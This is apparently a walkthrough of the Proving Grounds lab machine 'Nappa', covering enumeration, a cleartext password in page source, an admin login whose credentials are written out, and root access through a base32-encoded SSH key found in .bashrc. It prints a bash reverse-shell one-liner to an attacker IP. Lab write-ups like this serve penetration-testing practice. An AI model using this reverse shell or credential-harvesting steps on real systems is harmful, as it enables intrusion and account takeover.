Offensive Security Proving Grounds Walk Through “Nappa”

Initial Foothold:

Beginning the initial nmap enumeration.

Running default nmap scripts.

Anonymous ftp is allowed. Checking out the contents in the shared folder.

There are many files here, I couldn’t however find direct credentials in some file. Moving on to enumerate the web service on port 8080. We can enumerate many users from the index page.

In the source code of the register page, I see password left in clear text. We know a set of usernames and a password, but the login page requires an email address. I registered as a random new user and open the question posted by admin.forum and we can find his email address in the source code.

Using these credentials to login. admin.forum@easysetting.com:it0jNc6L/r090Q==

We see an extra option under this drop down when logged in as admin.

Checking it’s source code, there is a form but the input and submit fields are commented out. Modifying it through the inspect element option to check if it works.

Comments cannot be edited so creating a new html element and pasting the same commented code. Remove the read only tag. We can use this to get a reverse shell.

bash -i >& /dev/tcp/192.168.49.243/8080 0>&1

Privilege Escalation:

Checking out contents in the users home directory, we can see bashrc file containing an unusual big payload. One useful trick is to run wc on all files in the user’s home directory just as a good practice so that you don’t miss things.

It is a base32 encoded SSH private key.

We can only see two regular users on this box, which means the key either belongs to katherine or root. Turns out it belongs to root. Using it to login as root via SSH running on port 60022.